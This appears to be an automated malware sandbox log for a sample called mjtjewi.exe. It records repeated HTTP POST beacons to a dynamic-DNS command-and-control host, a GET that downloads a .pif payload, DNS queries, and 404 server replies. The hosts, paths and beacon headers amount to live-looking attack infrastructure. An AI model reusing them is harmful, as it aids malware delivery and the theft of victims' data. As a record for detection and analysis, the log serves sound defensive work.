                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 149Connection: close
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\mjtjewi.exeCode function: 6_2_00404ED4 recv,6_2_00404ED4
                    Source: global trafficHTTP traffic detected: GET /flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif HTTP/1.1Host: www.sodiumlaurethsulfatedesyroyer.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: www.sodiumlaurethsulfatedesyroyer.com
                    Source: global trafficDNS traffic detected: DNS query: freighteighttwocam.ddns.net
                    Source: unknownHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 176Connection: close
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:48 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:50 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:52 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:54 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
